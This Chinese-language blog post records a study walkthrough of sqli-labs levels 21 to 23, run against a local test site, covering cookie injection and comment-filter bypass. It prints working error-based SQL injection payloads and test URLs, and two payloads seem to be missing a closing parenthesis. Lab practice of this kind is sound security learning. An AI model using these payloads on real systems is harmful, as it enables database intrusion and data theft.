sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入
Less-21
Less-21 Cookie Injection- Error Based- complex - string
cookie注入-基于错误-复杂-字符串
测试
登录进去
]
uname
的值被加密,以=
结尾,首先想到base64
不出意外是base64加密
burp抓包,然后改cookie
中的uname
再加密就可以
payload
admin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#
源码
设置cookie
并使用base64加密
调用cookie
中的uname
并base64加密,sql语句直接进行查询并返回错误和结果
Less-22
Less-22 Cookie Injection- Error Based- Double Quotes - string
cookie注入-基于错误-双引号-字符串
payload
admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#
Less-23
Error Based- strip comments
基于错误-有过滤
测试
http://127.0.0.1/sqli/Less-23/?id=1'
http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+
都多了个'
,应该是过滤掉了注释符,那直接用引号来闭合
http://127.0.0.1/sqli/Less-23/?id=1' or 1='1
payload:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1
源码
对注释符进行了替换